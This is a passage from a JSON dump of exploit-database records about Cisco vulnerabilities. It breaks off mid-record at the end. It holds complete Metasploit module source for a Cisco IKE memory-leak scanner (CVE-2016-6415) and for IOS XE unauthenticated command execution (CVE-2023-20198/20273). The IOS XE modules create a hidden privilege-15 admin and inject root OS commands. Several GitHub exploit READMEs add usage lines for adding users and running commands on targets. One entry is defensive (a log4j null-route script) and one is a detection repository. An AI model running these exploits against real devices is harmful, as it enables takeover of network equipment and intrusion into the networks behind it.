'Nixawk' ], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2016-6415' ], \n[ 'URL', 'https://github.com/adamcaudill/EquationGroupLeak/tree/master/Firewall/TOOLS/BenignCertain/benigncertain-v1110' ], \n[ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1' ], \n[ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2016-6415' ], \n[ 'URL', 'https://musalbas.com/2016/08/18/equation-group-benigncertain.html' ] \n], \n'DisclosureDate' => '2016-09-29' \n)) \n \nregister_options( \n[ \nOpt::RPORT(500), \nOptPath.new('PACKETFILE', \n[ true, 'The ISAKMP packet file', File.join(Msf::Config.data_directory, 'exploits', 'cve-2016-6415', 'sendpacket.raw') ]) \n]) \nend \n \ndef run_host(ip) \nbegin \nisakmp_pkt = File.read(datastore['PACKETFILE']) \npeer = \"#{ip}:#{datastore['RPORT']}\" \n \nudp_sock = Rex::Socket::Udp.create( \n{ \n'Context' => { 'Msf' => framework, 'MsfExploit' => self } \n} \n) \n \nadd_socket(udp_sock) \n \nudp_sock.sendto(isakmp_pkt, ip, datastore['RPORT'].to_i) \nres = udp_sock.get(3) \nreturn unless res && res.length > 36 # ISAKMP + 36 -> Notitication Data... \n \n# Convert non-printable characters to periods \nprintable_data = res.gsub(/[^[:print:]]/, '.') \n \n# Show abbreviated data \nvprint_status(\"Printable info leaked:\\n#{printable_data}\") \n \nchars = res.unpack('C*') \nlen = (chars[30].to_s(16) + chars[31].to_s(16)).hex \n \nreturn if len <= 0 \nprint_good(\"#{peer} - IKE response with leak\") \nreport_vuln({ \n:host => ip, \n:port => datastore['RPORT'], \n:proto => 'udp', \n:name => self.name, \n:refs => self.references, \n:info => \"Vulnerable to Cisco IKE Information Disclosure\" \n}) \n \n# NETWORK may return the same packet data. \nreturn if res.length < 2500 \npkt_md5 = ::Rex::Text.md5(isakmp_pkt[isakmp_pkt.length-2500, isakmp_pkt.length]) \nres_md5 = ::Rex::Text.md5(res[res.length-2500, res.length]) \n \nprint_warning(\"#{peer} - IKE response is same to payload data\") if pkt_md5 == res_md5 \nrescue \nensure \nudp_sock.close \nend \nend \nend \n`\n",
"cvss": {
"score": 7.5,
"severity": "HIGH",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"sourceHref": "https://packetstormsecurity.com/files/download/180932/cisco_ike_benigncertain.rb.txt",
"vhref": "https://vulners.com/packetstorm/PACKETSTORM:180932"
},
{
"lastseen": "2024-08-31T23:08:51",
"description": "",
"published": "2024-08-31T00:00:00",
"type": "packetstorm",
"title": "Cisco IOX XE Unauthenticated Command Line Interface (CLI) Execution",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"modified": "2024-08-31T00:00:00",
"id": "PACKETSTORM:180826",
"href": "https://packetstormsecurity.com/files/180826/Cisco-IOX-XE-Unauthenticated-Command-Line-Interface-CLI-Execution.html",
"sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Auxiliary \n \ninclude Msf::Exploit::Remote::HTTP::CiscoIosXe \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Cisco IOX XE unauthenticated Command Line Interface (CLI) execution', \n'Description' => %q{ \nThis module leverages CVE-2023-20198 against vulnerable instances of Cisco IOS XE devices which have the \nWeb UI exposed. An attacker can execute arbitrary CLI commands with privilege level 15. \n \nYou must specify the IOS command mode to execute a CLI command in. Valid modes are `user`, `privileged`, and \n`global`. To run a command in \"Privileged\" mode, set the `CMD` option to the command you want to run, \ne.g. `show version` and set the `MODE` to `privileged`. To run a command in \"Global Configuration\" mode, set \nthe `CMD` option to the command you want to run, e.g. `username hax0r privilege 15 password hax0r` and set \nthe `MODE` to `global`. \n \nThe vulnerable IOS XE versions are: \n16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4, \n16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2, \n16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4, \n16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9, \n16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b, \n16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b, \n16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a, \n16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1, \n16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g, \n16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s, \n16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s, \n16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5, \n16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10, \n17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v, \n17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z, \n17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7, \n17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b, \n17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a, \n17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a, \n17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3, \n17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a, \n17.11.99SW \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'sfewer-r7', # MSF module \n], \n'References' => [ \n['CVE', '2023-20198'], \n# Vendor advisories. \n['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z'], \n['URL', 'https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/'], \n# Vendor list of (205) vulnerable versions. \n['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml'], \n# Technical details on CVE-2023-20198. \n['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/'], \n['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/'] \n], \n'DisclosureDate' => '2023-10-16', \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [], \n'SideEffects' => [IOC_IN_LOGS] \n} \n) \n) \n \nregister_options( \n[ \nOptString.new('CMD', [ true, 'The CLI command to execute.', 'show version']), \nOptString.new('MODE', [ true, \"The mode to execute the CLI command in, valid values are 'user', 'privileged', or 'global'.\", Mode::PRIVILEGED_EXEC]) \n] \n) \nend \n \ndef run \n# We convert escaped newlines into actual newlines, as the Cisco CLI will allow you to navigate from an upper mode \n# (e.g. Global) down to a lower mode (e.g. Privileged or User) via the \"exit\" command. We explicitly let a user \n# specify the mode to execute their CMD in, via the MODE option, however we must still support the user specifying \n# newlines as they may want to execute multiple commands (or manually navigate the difference modes). \ncmd = datastore['CMD'].gsub('\\\\n', \"\\n\") \nif cmd.empty? \nprint_error('Command can not be empty.') \nreturn \nend \n \nmode = Mode.to_mode(datastore['MODE'].to_s.downcase) \nif mode.nil? \nprint_error(\"Invalid mode specified, valid values are 'user', 'privileged', or 'global'\") \nreturn \nend \n \nresult = run_cli_command(cmd, mode) \nif result.nil? \nprint_error('Failed to run the command.') \nreturn \nend \n \nprint_line(result) \nend \n \nend \n`\n",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"sourceHref": "https://packetstormsecurity.com/files/download/180826/cisco_ios_xe_cli_exec_cve_2023_20198.rb.txt",
"vhref": "https://vulners.com/packetstorm/PACKETSTORM:180826"
},
{
"lastseen": "2024-09-01T00:05:24",
"description": "",
"published": "2024-08-31T00:00:00",
"type": "packetstorm",
"title": "Cisco IOX XE Unauthenticated OS Command Execution",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198",
"CVE-2023-20273"
],
"modified": "2024-08-31T00:00:00",
"id": "PACKETSTORM:180889",
"href": "https://packetstormsecurity.com/files/180889/Cisco-IOX-XE-Unauthenticated-OS-Command-Execution.html",
"sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Auxiliary \n \ninclude Msf::Exploit::Remote::HTTP::CiscoIosXe \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Retry \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Cisco IOX XE unauthenticated OS command execution', \n'Description' => %q{ \nThis module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE \ndevices which have the Web UI exposed. An attacker can execute arbitrary OS commands with root privileges. \n \nThis module leverages CVE-2023-20198 to create a new admin user, then authenticating as this user, \nCVE-2023-20273 is leveraged for OS command injection. The output of the command is written to a file and read \nback via the webserver. Finally the output file is deleted and the admin user is removed. \n \nThe vulnerable IOS XE versions are: \n16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4, \n16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2, \n16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4, \n16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9, \n16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b, \n16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b, \n16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a, \n16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1, \n16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g, \n16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s, \n16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s, \n16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5, \n16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10, \n17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v, \n17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z, \n17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7, \n17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b, \n17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a, \n17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a, \n17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3, \n17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a, \n17.11.99SW \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'sfewer-r7', # MSF module \n], \n'References' => [ \n['CVE', '2023-20198'], \n['CVE', '2023-20273'], \n# Vendor advisories. \n['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z'], \n['URL', 'https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/'], \n# Vendor list of (205) vulnerable versions. \n['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml'], \n# Technical details on CVE-2023-20198. \n['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/'], \n['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/'], \n# Technical details on CVE-2023-20273. \n['URL', 'https://blog.leakix.net/2023/10/cisco-root-privesc/'] \n], \n'DisclosureDate' => '2023-10-16', \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [], \n'SideEffects' => [IOC_IN_LOGS] \n} \n) \n) \n \nregister_options( \n[ \nOptString.new('CMD', [ true, 'The OS command to execute.', 'id']), \nOptString.new('CISCO_ADMIN_USERNAME', [false, 'The username of an admin account. If not set, CVE-2023-20198 is leveraged to create a new admin account.']), \nOptString.new('CISCO_ADMIN_PASSWORD', [false, 'The password of an admin account. If not set, CVE-2023-20198 is leveraged to create a new admin password.']), \nOptInt.new('REMOVE_OUTPUT_TIMEOUT', [true, 'The maximum timeout (in seconds) to wait when trying to removing the commands output file.', 30]) \n] \n) \nend \n \ndef run \n# If the user has supplied a username/password, we can use these creds to leverage CVE-2023-20273 and execute an OS \n# command. If a username/password have not been supplied, we can leverage CVE-2023-20198 to create a new admin \n# account, and then leverage CVE-2023-20273 to execute an OS command. This opens up the ability to leverage the \n# auxiliary module for CVE-2023-20198 to create a new admin account once, then use those new admin creds in this \n# module to execute multiple OS command without the need to create a new 'temporary' admin account for every \n# invocation of this module (which will reduce the noise in the devices logs). \nif !datastore['CISCO_ADMIN_USERNAME'].blank? && !datastore['CISCO_ADMIN_PASSWORD'].blank? \nexececute_os_command(datastore['CISCO_ADMIN_USERNAME'], datastore['CISCO_ADMIN_PASSWORD']) \nelse \nadmin_username = Rex::Text.rand_text_alpha(8) \nadmin_password = Rex::Text.rand_text_alpha(8) \n \nunless run_cli_command(\"username #{admin_username} privilege 15 secret #{admin_password}\", Mode::GLOBAL_CONFIGURATION) \nprint_error('Failed to create admin user') \nreturn \nend \n \nbegin \nvprint_status(\"Created privilege 15 user '#{admin_username}' with password '#{admin_password}'\") \n \nexececute_os_command(admin_username, admin_password) \nensure \nvprint_status(\"Removing user '#{admin_username}'\") \n \nunless run_cli_command(\"no username #{admin_username}\", Mode::GLOBAL_CONFIGURATION) \nprint_warning('Failed to remove user') \nend \nend \nend \nend \n \ndef exececute_os_command(admin_username, admin_password) \nout_file = Rex::Text.rand_text_alpha(8) \n \ncmd = \"$(openssl enc -base64 -d <<< #{Base64.strict_encode64(datastore['CMD'])}) &> /var/www/#{out_file}\" \n \nunless run_os_command(cmd, admin_username, admin_password) \nprint_error('Failed to run command') \nreturn \nend \n \nbegin \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri('webui', out_file), \n'headers' => { \n'Authorization' => basic_auth(admin_username, admin_password) \n} \n) \n \nunless res&.code == 200 \nprint_error('Failed to get command output') \nreturn \nend \n \nprint_line(res.body) \nensure \nvprint_status(\"Removing output file '/var/www/#{out_file}'\") \n \n# Deleting the output file can take more than one attempt. \nsuccess = retry_until_truthy(timeout: datastore['REMOVE_OUTPUT_TIMEOUT']) do \nif run_os_command(\"rm /var/www/#{out_file}\", admin_username, admin_password) \nnext true \nend \n \nvprint_status('Failed to delete output file, waiting and trying again...') \nfalse \nend \n \nunless success \nprint_error(\"Failed to delete output file '/var/www/#{out_file}\") \nprint_error(out_file) \nend \nend \nend \nend \n`\n",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"sourceHref": "https://packetstormsecurity.com/files/download/180889/cisco_ios_xe_os_exec_cve_2023_20273.rb.txt",
"vhref": "https://vulners.com/packetstorm/PACKETSTORM:180889"
},
{
"lastseen": "2024-09-15T11:06:53",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2021-44228"
],
"description": "# log4j-nullroute\nQuick script to ingest IP feed from greynoise.io for log4j (CVE-2021-44228) and null route bad addresses. Works w/Cisco IOS-XE and Arista EOS.\n\nUse the exceptions file to omit any IPs you find in the list that you do not want to null route.\n\nRequired fill-ins for vars:\n\nsecrets.py\n------------\nusername, password, api_key\n\nnullroute.py\n-------------\nedge_routers",
"modified": "2024-08-12T20:18:50",
"id": "BE66A9B6-104B-5F49-918A-8B913CE46473",
"published": "2021-12-13T03:15:42",
"href": "https://github.com/0xRyan/log4j-nullroute",
"type": "githubexploit",
"title": "Exploit for Expression Language Injection in Apache Log4J",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/BE66A9B6-104B-5F49-918A-8B913CE46473"
},
{
"lastseen": "2024-07-15T18:18:07",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"description": "# Fofa\n\n```\nbody=\"<script>window.onload=function(){ url ='/webui';window.location.href=url;}</script>\" && is_honeypot=false && is_fraud=false\n```\n\n# Usage\n\n```\nusage: CVE-2023-20198-RCE.py [-h] -u URL [-p PROXY] [-au ADD_USER] [-ap ADD_PASS] [-du DEL_USER] [-pm PRIVILEGE_MODE]\n [-em EXPLOIT_MODE] [-oc OS_CMD] [-cc CLI_CMD]\n\nCVE-2023-20198-RCE\n\noptions:\n -h, --help show this help message and exit\n -u URL, --url URL target url to check, eg: http://example.com\n -p PROXY, --proxy PROXY\n proxy url, eg: http://127.0.0.1:8083\n -au ADD_USER, --add-user ADD_USER\n username to add.If left blank, an 8-digit mixed case English string will be randomly\n generated.\n -ap ADD_PASS, --add-pass ADD_PASS\n password to add.If left blank, an 8-digit mixed case English string will be randomly\n generated.\n -du DEL_USER, --del-user DEL_USER\n username to delete\n -pm PRIVILEGE_MODE, --privilege-mode PRIVILEGE_MODE\n user/privileged\n -em EXPLOIT_MODE, --exploit-mode EXPLOIT_MODE\n user/cmd\n -oc OS_CMD, --os-cmd OS_CMD\n exec os command\n -cc CLI_CMD, --cli-cmd CLI_CMD\n exec cli command\n```\n\nFor example:\n\n```powershell\npython CVE-2023-20198-RCE.py -u http://192.168.1.198 -p http://127.0.0.1:8083 -em cmd -pm privileged -cc \"show version\" \n\npython CVE-2023-20198-RCE.py -u http://192.168.1.198 -p http://127.0.0.1:8083 -em cmd -oc \"uname -a\" \n\npython CVE-2023-20198-RCE.py -u http://192.168.1.198 -p http://127.0.0.1:8083 -em user -au -ap\n\npython CVE-2023-20198-RCE.py -u http://192.168.1.198 -p http://127.0.0.1:8083 -em user -au hahahahha -ap hahahahha\n\npython CVE-2023-20198-RCE.py -u http://192.168.1.198 -p http://127.0.0.1:8083 -em user -du aaaaaa\n\n```\n\n![](https://cdn.jsdelivr.net/gh/W01fh4cker/blog_image@main/image-20240425153133359.png)\n",
"modified": "2024-07-15T13:33:36",
"id": "0004572D-8F1A-5FA0-B583-57259E099827",
"published": "2024-04-25T06:59:53",
"href": "https://github.com/W01fh4cker/CVE-2023-20198-RCE",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/0004572D-8F1A-5FA0-B583-57259E099827"
},
{
"lastseen": "2024-07-02T22:16:07",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"description": "# CVE-2023-20198\nAn Exploitation script developed to exploit the CVE-2023-20198 Cisco zero day vulnerability on their IOS XE\n\nHackers have been widely exploiting the this vulnerability which creates a 15 level privilege user by bypassing the authentication\nWhich a malicous xml content make this exploitation the webui endpoint of cisco.This is not only for Exploitation also detects\nvulneable implant for exploitations and The tool can also use for mass detectiona and exploitation!.\n\n# Installation\n```bash\ngit clone https://github.com/sanjai-AK47/CVE-2023-20198.git\ncd CVE-2023-20198\npip install -r requirements.txt\n```\n\n# Usages:\n\n## Modes:\n\n```bash\npython3 exploit.py --help \nusage: exploit.py [-h] {Detect,Exploit} ...\n\n[DESCTIPTION]: Exploitation and Detection tool for Cisco CVE-2023-20198\n\noptions:\n -h, --help show this help message and exit\n\n[MODE]: Exploitation | Detections Modes:\n {Detect,Exploit} [INFO]: Select either Exploit or Detect mode\n Detect [INFO]: Detection mode detect the vulnerable implant to exploit\n Exploit [INFO]: Exploitation mode exploit the vulnerable implant of CVE-2023-20198\n\n```\n\n## Detection:\n\n```bash\npython3 exploit.py Detect -h \nusage: exploit.py Detect [-h] [-d DOMAIN] [-dL DOMAINS_LIST] [-px PROXY] [-to TIME_OUT] [-o OUTPUT] [-v]\n\noptions:\n -h, --help show this help message and exit\n -d DOMAIN, --domain DOMAIN\n [INFO]: Target domain for exploiting without protocol eg:(www.domain.com)\n -dL DOMAINS_LIST, --domains-list DOMAINS_LIST\n [INFO]: Targets domain for exploiting without protocol eg:(www.domain.com)\n -px PROXY, --proxy PROXY\n [INFO]: Switiching proxy will send request to your configured proxy (eg: BURPSUITE)\n -to TIME_OUT, --time-out TIME_OUT\n [INFO]: Switiching timeout will requests till for your timeout and also for BURPSUITE\n -o OUTPUT, --output OUTPUT\n [INFO]: File name to save output\n -v, --verbose [INFO]: Switching verbose will shows failed and offline targets\n\n\n```\n## Exploitation\n\n```bash\npython3 exploit.py Exploit -h \nusage: exploit.py Exploit [-h] [-cfc CONFIG_CONTENT] [-d DOMAIN] [-dL DOMAINS_LIST] [-px PROXY] [-to TIME_OUT] [-o OUTPUT] [-v]\n\noptions:\n -h, --help show this help message and exit\n -cfc CONFIG_CONTENT, --config-content CONFIG_CONTENT\n [INFO]: Customized config contents for exploitation\n -d DOMAIN, --domain DOMAIN\n [INFO]: Target domain for exploiting without protocol eg:(www.domain.com)\n -dL DOMAINS_LIST, --domains-list DOMAINS_LIST\n [INFO]: Targets domain for exploiting without protocol eg:(www.domain.com)\n -px PROXY, --proxy PROXY\n [INFO]: Switiching proxy will send request to your configured proxy (eg: BURPSUITE)\n -to TIME_OUT, --time-out TIME_OUT\n [INFO]: Switiching timeout will requests till for your timeout and also for BURPSUITE\n -o OUTPUT, --output OUTPUT\n [INFO]: File name to save output\n -v, --verbose [INFO]: Switching verbose will shows failed and offline targets\n\n```\n\n# Information:\n\nSince the exploitation and detection tool is developed by theoritical poc by [Horizona3](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/)https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/Imp which is help me to develop this \ntool for this CVE and for detection it can detect the vulnerable cisco implant but for proper exploitation users needs to pass the malicous XML content that is is theoritical poc of horizona3 need\nto be given by users for exploitations because of only theoritical explaination have to do this but soon after proper information and resources will upgrade this exploitation and detection Tool\n\n\n# Warning:\nImportant thing if any unethical exploitation the I'm not responsible for any illegal actions so plese use this for ethical and legal \npurposes\n\nProof of conept Developed by [D.Sanjai Kumar](https://www.linkedin.com/in/d-sanjai-kumar-109a7227b/) with \u2665\ufe0f for any upgrade and miscoded contact me throguh my [LinkedIn](https://www.linkedin.com/in/d-sanjai-kumar-109a7227b/).\nThank you!\n\n\n\n\n\n\n\n",
"modified": "2024-07-02T20:29:59",
"id": "AF4F20F9-F1D7-5E63-BD2F-2BE8017C5213",
"published": "2023-11-03T13:05:59",
"href": "https://github.com/sanjai-AK47/CVE-2023-20198",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/AF4F20F9-F1D7-5E63-BD2F-2BE8017C5213"
},
{
"lastseen": "2024-06-05T17:29:24",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"description": "# CVE-2023-20198-RCE\nCVE-2023-20198-RCE, support adding/deleting users and executing cli commands/system commands.\n# Usage\nCVE-2023-20198-RCE.py [-h] -u URL [-p PROXY] [-au ADD_USER] [-ap ADD_PASS] [-du DEL_USER] [-pm PRIVILEGE_MODE]\n [-em EXPLOIT_MODE] [-oc OS_CMD] [-cc CLI_CMD]\n\nCVE-2023-20198-RCE\n\noptions:\n -h, --help show this help message and exit\n -u URL, --url URL target url to check, eg: http://example.com\n -p PROXY, --proxy PROXY\n proxy url, eg: http://127.0.0.1:8083\n -au ADD_USER, --add-user ADD_USER\n username to add.If left blank, an 8-digit mixed case English string will be randomly\n generated.\n -ap ADD_PASS, --add-pass ADD_PASS\n password to add.If left blank, an 8-digit mixed case English string will be randomly\n generated.\n -du DEL_USER, --del-user DEL_USER\n username to delete\n -pm PRIVILEGE_MODE, --privilege-mode PRIVILEGE_MODE\n user/privileged\n -em EXPLOIT_MODE, --exploit-mode EXPLOIT_MODE\n user/cmd\n -oc OS_CMD, --os-cmd OS_CMD\n exec os command\n -cc CLI_CMD, --cli-cmd CLI_CMD\n exec cli command\n",
"modified": "2024-05-29T11:13:41",
"id": "70A262CE-4967-5480-9A9B-FA07CF9A9EA0",
"published": "2024-04-28T01:25:41",
"href": "https://github.com/Codeb3af/CVE-2023-20198-RCE",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/70A262CE-4967-5480-9A9B-FA07CF9A9EA0"
},
{
"lastseen": "2024-08-11T05:02:30",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198",
"CVE-2023-20273",
"CVE-2019-20198"
],
"description": "# Cisco IOS XE implant scanning & network detection\nNetwork detection of `CVE-2023-20198` exploitation and fingerprinting of post-exploitation of Cisco IOS XE devices.\n\n## CVE-2023-20198 Suricata network detection\nThe [suricata/](suricata/) folder contains Suricata detection rules for exploitation of `CVE-2023-20198`. These rules monitor for a percent-encoded-percent which can be used to bypass authentication on Cisco IOS XE devices not patched for `CVE-2023-20198`.\n\nThis directory also contains reference PCAPs based on observed in-the-wild exploitation traffic:\n\n* [fox-it-cisco-cve-2023-20198-auth-bypass-wsma-exec.pcap](suricata/fox-it-cisco-cve-2023-20198-auth-bypass-wsma-exec.pcap?raw=true) -- CVE-2019-20198 exploit with wsma-exec\n* [fox-it-cisco-cve-2023-20198-auth-bypass-wsma-config.pcap](suricata/fox-it-cisco-cve-2023-20198-auth-bypass-wsma-config.pcap?raw=true) -- CVE-2019-20198 exploit with wsma-config\n\n## Cisco IOS XE implant scanning\nThis repository also contains information regarding post-exploitation activities linked to the 